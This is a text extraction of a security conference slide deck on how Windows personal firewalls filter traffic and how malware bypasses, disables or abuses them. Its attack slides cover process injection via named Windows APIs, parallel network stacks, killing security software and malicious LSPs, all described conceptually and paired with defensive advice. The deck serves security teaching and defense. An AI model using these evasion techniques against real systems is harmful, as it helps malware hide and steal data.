Defeating Windows

1
Defeating Windows Personal Firewalls
Chris Ries Security Research Engineer VigilantMind
s Inc.
2
What I Do

• Vulnerability Research
• Discovery, Exploitation, Remediation
• Malware Analysis
• Rootkits, Stealth Malware
• Security Software Evaluation

3
Background

• Attacks against personal firewalls have been
  around for a while
• Circumvent, disable, or abuse filtering
• Many personal firewalls are still susceptible to
  a variety of attacks
• These attacks are becoming common in everyday
  malware

4
Topics

• Intro to Personal Firewalls
• Uses, configuration, management, etc.
• Network Filtering with Windows
• Attacking Personal Firewalls
• Stealth Malware
• Improving Security of Personal Firewalls

5
Intro to Personal Firewalls
6
Value of Personal Firewalls

• Acts like network firewall
• Additional granularity of per application
  filtering
• Additional knowledge of system
• Complements anti-virus
• More behavior-based, better for unknown malware
• Can be used to enforce acceptable use policies
• P2P
• Chat

7
Downsides

• Scalability issues
• Usability / Management issues
• Can be noisy
• Configuration can be painful
• Some can be easily defeated (more on this later)

8
Inbound Protection

• Also available from firewall built into Windows
• Block access to ports that may need to be
  listening
• MS Ports
• ActiveSync
• Stealth capabilities
• Limit impact of compromise
• Backdoors not reachable

9
Outbound Protection

• Minimize impact of malware infections
• Protect against malware that gets by AV
• Prevent worms from propagating
• Spyware / adware may not be able to transmit
  stolen information
• Reverse-connect shells not reachable
• Alerts / Logs can identify infected hosts

10
Application Fingerprinting

• Many personal firewalls keep track of
  applications using fingerprints
• Allows firewall to uniquely identify trusted
  applications
• Firewall can alert of any changes that are made

11
Caveats

• Code injected into trusted process hijacks the
  process network capabilities, so personal
  firewall cannot always limit impact of
  exploitation.
• Ex. Code injected from exploitation of browser
  vulnerability can connect out on port 80.

12
Centralized Management

• Policy Management
• Generic groups for workstations, laptops, web
  servers, etc.
• Changes can be made to individual policies via
  central console
• User cannot override policy or disable firewall
• Logging
• Logs can be aggregated centrally
• Automated analysis can be performed to identify
  security incidents

13
Policies

• Need default deny rule
• Create rules at multiple levels
• Application level
• Network level
• Different policies for different interfaces or
  locations

14
Network Filtering with Windows
15
Tour of Windows Networking
Networking Applications
Networking API
Networking API
TDI
Network Protocol
NDIS
NDIS
HAL
NIC
16
NDIS

• Network Driver Interface Specification
• Standard interface that higher level protocols
  can use to communicate with NICs
• Communicates with NIC via the Hardware
  Abstraction Layer

17
Network Protocol Layer

• Network and Transport layer protocols
• Ex. TCPIP.SYS
• Communicates with NDIS below it
• Higher layers communicate with TCPIP.SYS via the
  TDI interface

18
TDI

• Transport Driver Interface (some also say
  Transport Device Interface, or Transport Data
  Interface)
• Allows higher levels to remain independent of
  transport-layer protocols
• Unlike NDIS, no driver for TDI

19
Network API / Sockets

• TDI client (communicates with TDI layer below it)
• Provides Application Programming Interface (API)
  for user-mode applications to use (Ex. Winsock
  API)
• Part of it implemented in kernel, part in
  user-mode
• This level can be further split up into many
  sub-levels (Winsock, RPC, Named Pipes, etc. all
  different)

20
Tour of Windows Networking
Web browser
Winsock API
Winsock
TDI
TCPIP.SYS
NDIS
NDIS.SYS
HAL
NIC
21
Filtering Techniques

• Filtering can be performed at a variety of places
• Higher levels
• More application info
• Lower levels
• Less stack exposure
• More packet information

22
NDIS Filtering

• Pros
• Access to lots of packet information
• Not much of the stack is exposed to traffic
• Cons
• Tasks such as re-assembly may not have occurred
  yet
• Not easy to associate traffic with applications

23
NDIS Filtering Techniques

• Intermediate (IM) Driver
• Installed into NDIS Layer
• NDIS-hooking filter driver
• Hooks NDIS wrapper functions

24
Network Protocol Filtering

• Pros
• Many mechanisms for filtering built into
  TCPIP.SYS
• Cons
• Filtering will not apply to other protocol drivers

25
Network Protocol Filtering Techniques

• Filter-hook driver
• Driver implements a function to determine whether
  to pass, modify, or drop packet
• Only one can be installed at a time
• Routing and Remote Access (RRAS) Packet Filtering
  API
• Can be accessed from user-mode
• Can only filter on limited information
• Firewall-hook drivers
• More than one can be installed at same time
• Windows XP Firewall is implemented as
  firewall-hook driver (ipnat.sys)

26
TDI Filtering

• TDI Filter driver sits between TDI clients (ex.
  Winsock) and TDI provider (ex. TCPIP.SYS)
• Pros More application-level info available
• Cons Not much packet information available, most
  of stack is exposed to network traffic

27
Network API Filtering

• Different filtering methods available from
  different APIs
• Can also hook into kernel-mode code
• Pros Very close to applications, good for
  inspecting higher-layer protocols
• Cons Very little packet information available,
  filtering will not apply to other APIs

28
Winsocks Service Provider Interface (SPI)

• Winsocks SPI can be used to create
• Base protocols
• Layered Service Providers (LSPs)
• Filtering LSP above TCP/IPbase protocol can
  performweb filtering, e-mail filtering, etc.

29
Note on Vista

• Packet filtering methods are different in Vista
• Windows Filter Platform (WFP) architecture can be
  used to plug filter drivers into various layers
  of the stack
• Basic filtering can be performed with Vista APIs,
  more thorough filtering can be accomplished with
  callout drivers.
• See http//www.microsoft.com/whdc/device/network/
  WFP.mspx

30
Firewall Attacks
31
Firewall Attacks

• Circumventing filtering
• Disabling protection
• Malicious uses for filtering

32
Firewall Attacks

• Most are local attacks that would be used after
  compromise/infection
• We will not focus on method of infection /
  compromise here, but could be
• Inbound network worm over open port
• Client-side attack (web, e-mail, etc.)
• Inside attack

33
Firewall Attacks

• Many of these techniques are complementary to
  rootkits / stealth malware
• Can be used to provide hidden backdoor access to
  compromised hosts
• Firewall may appear to be functioning properly
  even when it is being bypassed

34
Subverting Filtering

• Communicate directly with layer below Filtering
  Parallel Stack
• Examples
• Network Protocol driver to bypass TDI filtering
• NDIS-layer driver to bypass network protocol
  filtering

35
Subverting Filtering
Networking Applications
Networking API
Networking API
TDI
Network Protocol Driver
Filtering
TCPIP.SYS
BACKDOOR
NDIS
NDIS
HAL
NIC
36
Subverting Filtering
Networking Applications
Networking API
Networking API
TDI
TCPIP.SYS
Filtering
NDIS
NDIS IM driver or filter hooks
NDIS
BACKDOOR
HAL
NIC
37
Subverting Filtering

• Even lower?
• Hardware Abstraction Layer (HAL)
• NIC Firmware
• SubVirt

Malicious Service
Original Operating System
Rootkit Virtual Machine
Hardware
SubVirt
38
Hijacking Trust

• Launch the application
• Process Injection
• Inter-process communication (IPC)
• Plugins
• Browser Helper Objects

39
Process Injection

• Used by malware for stealth purposes
• No suspicious process running
• Used by user-mode rootkits to install hooks into
  every running process
• Hooks hide files, registry keys, and other
  resources from the process

40
Process Injection How It Works

• Malicious process injects code into target
  process
• VirtualAllocEx() and WriteProcessMemory()
• Malicious process runs injected code in target
  process
• CreateRemoteThread()
• SetThreadContext()
• Injected code has network privileges of target
  process

41
Disabling Protection

• Kill processes that belong to security software
• Remove registry keys that belong to security
  software
• Delete, overwrite, or modify files that belong to
  security software
• Executables, policy and configuration files

42
Disabling Protection

• Unload, uninstall, delete kernel drivers
• Remove kernel hooks
• Filter hooks
• Other hooks used for registry protection, process
  injection protection, etc.

43
Abusing Filtering

• Block access to update sites (Microsoft updates,
  AV updates, etc.)
• Edit hosts file (traditional method)
• Add packet filter
• Fantibag trojan used RRAS packet filtering API to
  block access to AV sites

44
Malicious LSPs

• Steal information
• Usernames, passwords
• Banking information
• Modify or block traffic
• Can be installed in specific location ofchain

Web browser
Winsock API
Malicious LSP
LSP
Base Protocol
45
Stealth Malware
46
Kernel-mode Backdoors

• eEye BootRoot
• Boot sector rootkit
• Hooks NDIS.SYS when driver is loaded
• Hooks look at incoming packets for code to run
• Some other rootkits implement a backdoor in a
  network protocol driver

47
Process Injecting Malware

• W32.Esbot.A, W32.Randex.E, Trojan.Mitglieder.E,
  W32.Nimda.A_at_mm, W32.Bofra.C_at_mm, W32.Beagle.C_at_mm,
  W32.Beagle.G_at_mm, Backdoor.Beasty.Hmm,
  W32.HLLW.Lovgate.O_at_mm, W32.Bobax.D,
  W32.Wullik_at_mm, Infostealer.Wowcraft,
  Downloader.SmallWeb, Spyware.Look2Me,
• Hacker Defender
• Turns every listening socket into a backdoor
  using a combination of process injection and hook
  insertion

48
Malicious LSPs

• Very common for adware / spyware
• Steal sensitive information
• Track web browsing habits, etc.
• http//www.castlecops.com/LSPs.html for a long
  list

49
TROJ_RILER.B dropped by PowerPoint 0day
50
Finding and Removing LSPs

• HijackThis
• LSPFix ?
• LSP Explorer

51
Improving Security
52
Better Personal Firewalls

• Better Personal Firewalls
• Low-level filtering
• Application Protection
• Self-defense
• Hooks, drivers, files, registry keys

53
Low-level Filtering

• Filter at lowest possible level to prevent
  subversion attacks
• Filter at multiple levels
• Defense in depth
• More information about activity

54
Application Protection

• Monitor
• Creation of new processes
• Calls to functions used for process injection
• IPC
• Executable fingerprinting
• Watch for changes to applications and libraries

55
How To Test

• Tools have been created to test for many of these
  weaknesses
• http//www.firewallleaktester.com
• See my paper Defeating Windows Personal
  Firewalls for more details on testing
  http//www.vigilantminds.com/files/defeating_windo
  ws_personal_firewalls.pdf

56
Supplementary Tools

• Address weaknesses in specific firewalls with
  supplementary tools
• ProcessGuard
• AppDefend
• Antihook
• Prevx

57
More Complete Security Software

• Host Intrusion Prevention Systems (HIPS)
• Network filtering
• Registry Protection
• Filesystem Protection
• Application-level Protection
• Operating system Protection
• Kernel, drivers, etc.
• Self-defense
• Cisco CSA, McAfee Entercept, eEye Blink, etc.

58
Best Practices

• Harden systems
• Use limited privilege accounts
• User education
• Periodic testing and auditing

59
Conclusions

• Personal Firewalls can be very useful for
  preventing and limiting the impact of compromises
  and infections
• There are a number of attacks that can be used to
  bypass, disable, or abuse the filtering
  capabilities of firewalls
• Better firewalls, supplementary tools, and
  general best practices can help to defend
  against these attacks

60
Thank You!Questions? Comments?
Contact Info 412-661-5700 x258 Chris.Ries_at_vigilan
tminds.com